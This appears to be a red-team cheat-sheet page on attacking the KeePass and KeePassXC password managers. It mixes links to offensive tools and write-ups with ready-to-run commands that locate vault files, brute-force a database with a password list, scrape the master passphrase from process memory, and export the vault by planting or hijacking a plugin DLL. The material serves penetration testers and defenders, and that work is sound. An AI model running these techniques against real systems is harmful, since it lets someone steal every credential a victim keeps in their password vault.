# KeePass

* <https://blog.harmj0y.net/redteaming/a-case-study-in-attacking-keepass/>
* <https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/>
* <https://habr.com/ru/post/346820/>
* <https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8>

Enumerate DB locations:

```
Cmd > type "%APPDATA%\KeePass\KeePass.config.xml" | findstr "<Path>"
```

Unlock with CLI:

```
$ for pw in `cat passwords.txt`; do echo "$pw" | keepassxc-cli ls db.kdbx [--key-file key.keyx] |& grep -v -e Enter -e Error -e If; done
```

## KeePassXC

* <https://github.com/keepassxreboot/keepassxc>

Check the installed version:

```
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
```

### Extract Passphrase from Memory

* <https://github.com/d3lb3/KeePass-the-Hash>

Using [strings2](https://github.com/glmcdona/strings2):

```
PS > .\strings2.exe -pid (Get-Process KeePassXC).Id -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gi .\KeePassXC_strings.txt).length / 1mb
```

Using `Get-ProcessStrings` from [PowerShellArsenal/MemoryTools](https://github.com/mattifestation/PowerShellArsenal/blob/master/MemoryTools/MemoryTools.ps1):

```
PS > Get-ProcessStrings -Id 1337 | Out-File KeePassXC_strings.txt
$ dos2unix KeePassXC_strings.txt
$ cat KeePassXC_strings.txt | awk '{print $3}' | grep -x '.\{5,30\}' > words
```

## DLL Hijacking

* <https://skr1x.github.io/keepass-dll-hijacking/>

## Extract Passphrase from Memory (< v2.53.1)

**CVE-2023-32784**

* <https://github.com/vdohney/keepass-password-dumper>
* <https://github.com/CMEPW/keepass-dump-masterkey>
* <https://www.forensicxlab.com/posts/keepass/>

## Abusing KeePass Triggers (< v2.54)

* <https://d3lb3.github.io/keepass_triggers_arent_dead/>
* <https://gist.github.com/d3lb3/fb6f5d82e47744f56117b350d94a6029>
* <https://19dx.ru/2023/06/triggery-keepass-mertvy-da-zdravstvuyut-triggery-keepass/>

## Tools

### KeeFarce

* <https://github.com/denandz/KeeFarce>

### KeeFarceReborn

* <https://github.com/d3lb3/KeeFarceReborn>

#### Abusing the KeePass Plugin Cache

* <https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html>
* <https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin>

Export DB by compiling and loading a custom plugin (requires administrator privileges to place the `.plgx` file):

```
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
```

Export DB by hijacking a legit plugin DLL (requires an existing plugin in use):

```
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
```

### KeePassHax

* <https://github.com/HoLLy-HaCKeR/KeePassHax>

### KeeThief

* <https://github.com/GhostPack/KeeThief>

### CrackMapExec

* <https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_discover.py>
* <https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/modules/keepass_trigger.py>

### KeePwn

* <https://github.com/Orange-Cyberdefense/KeePwn>

### ThievingFox

* <https://blog.slowerzs.net/posts/thievingfox/>
* <https://github.com/Slowerzs/ThievingFox/tree/main/keepassfox>
* <https://github.com/Slowerzs/ThievingFox/tree/main/keepassxcfox>
